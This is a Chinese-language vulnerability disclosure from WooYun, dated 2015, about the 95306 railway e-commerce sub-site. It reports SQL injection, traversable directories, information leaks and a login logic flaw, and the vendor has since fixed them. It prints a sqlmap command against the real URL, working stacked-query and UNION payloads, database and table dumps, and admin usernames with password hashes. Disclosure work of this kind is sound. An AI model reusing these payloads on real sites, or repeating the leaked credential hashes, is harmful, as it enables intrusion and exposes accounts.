中国铁路总公司95306分站SQL注入+配置不当

编号114014
Urlhttp://www.wooyun.org/bug.php?action=view&id=114014
漏洞状态厂商已经修复
漏洞标题中国铁路总公司95306分站SQL注入+配置不当
漏洞类型SQL注射漏洞
厂商12306
白帽子乌有先生
提交日期2015-05-14 12:38:00
公开日期2015-06-30 15:04:00
修复时间2015-06-30 15:04:00
确认时间2015-05-19 00:00:00
Confirm Spend5
漏洞标签asp+sqlserver注射 遍历 设计逻辑错误
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank5
漏洞简介
95306分站,SQL注入、目录配置不当可遍历、敏感信息泄露、网站逻辑设计不当
漏洞细节

95306主站

1.jpg


95306电子商务分站

2.jpg


0x00、SQL注入

sqlmap -u "https://xsp.95306.cn:443/page.asp?id=-1"


---
Parameter: id (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=-1;WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(102)+CHAR(73)+CHAR(121)+CHAR(71)+CHAR(76)+CHAR(119)+CHAR(76)+CHAR(117)+CHAR(107)+CHAR(99)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113),NULL,NULL--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] stepgozsdata
[*] tempdb
---
current user is DBA: False
---
Database: stepgozsdata
[24 tables]
+------------------+
| KDZF |
| about |
| adkefu |
| admin |
| banner |
| cart |
| complain |
| hzxx |
| i_pic |
| keywords |
| msg |
| news |
| orderfahuo |
| orderlist |
| pro_addattention |
| pro_addattention |
| pro_bclass |
| pro_brand |
| pro_class |
| pro_consultation |
| pro_fav |
| pro_score |
| vip_recived |
| vip_recived |
+------------------+
---
Database: stepgozsdata
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| dbo.vip_recived | 1713 |
| dbo.vip_recived | 1713 |
| dbo.cart | 836 |
| dbo.orderlist | 582 |
| dbo.pro_class | 426 |
| dbo.pro_bclass | 68 |
| dbo.KDZF | 63 |
| dbo.pro_brand | 22 |
| dbo.orderfahuo | 17 |
| dbo.about | 12 |
| dbo.banner | 6 |
| dbo.pro_fav | 5 |
| dbo.hzxx | 2 |
| dbo.pro_addattention | 2 |
| dbo.pro_addattention | 2 |
| dbo.adkefu | 1 |
| dbo.admin | 1 |
| dbo.complain | 1 |
| dbo.i_pic | 1 |
| dbo.keywords | 1 |
| dbo.msg | 1 |
| dbo.news | 1 |
| dbo.pro_consultation | 1 |
+----------------------+---------+
---
Database: stepgozsdata
Table: admin
[1 entry]
+----+------------------+-----------+
| id | adminpwd | adminname |
+----+------------------+-----------+
| 1 | 7a57a5a743894a0e | admin |
+----+------------------+-----------+
---
Database: stepgozsdata
Table: adkefu
[1 entry]
+----+--------+------------------+-----------+
| id | danwei | adminpwd | adminname |
+----+--------+------------------+-----------+
| 9 | P | fac8fbd2667c6995 | chouming |
+----+--------+------------------+-----------+
---
其中有大量货运订单详细信息。
另外,类似的注入还有好几处。
eg:
https://xsp.95306.cn:443/brand.asp?brand=-1
0x01、目录配置不当可遍历
eg:

3.jpg


4.jpg


以上列表中目录均可遍历。
0x02、敏感信息泄露

5.jpg


6.jpg


7.jpg


8.jpg


0x03、网站逻辑设计不当
任意已注册用户,登陆得到相同页面,包含特定订单信息。
未登陆页面:

9.jpg


10.jpg


登陆任意用户页面:

11.jpg


12.jpg


难道是测试专用页...?即便这样还是觉得有问题。

POC

如上

修复方案

修整或者下线。

状态信息 2015-05-14: 细节已通知厂商并且等待厂商处理中
2015-05-19: 厂商已经确认,细节仅向厂商公开
2015-05-29: 细节向核心白帽子及相关领域专家公开
2015-06-08: 细节向普通白帽子公开
2015-06-18: 细节向实习白帽子公开
2015-06-30: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复谢谢。
回应信息危害等级:低漏洞Rank:5 确认时间:2015-05-19 09:13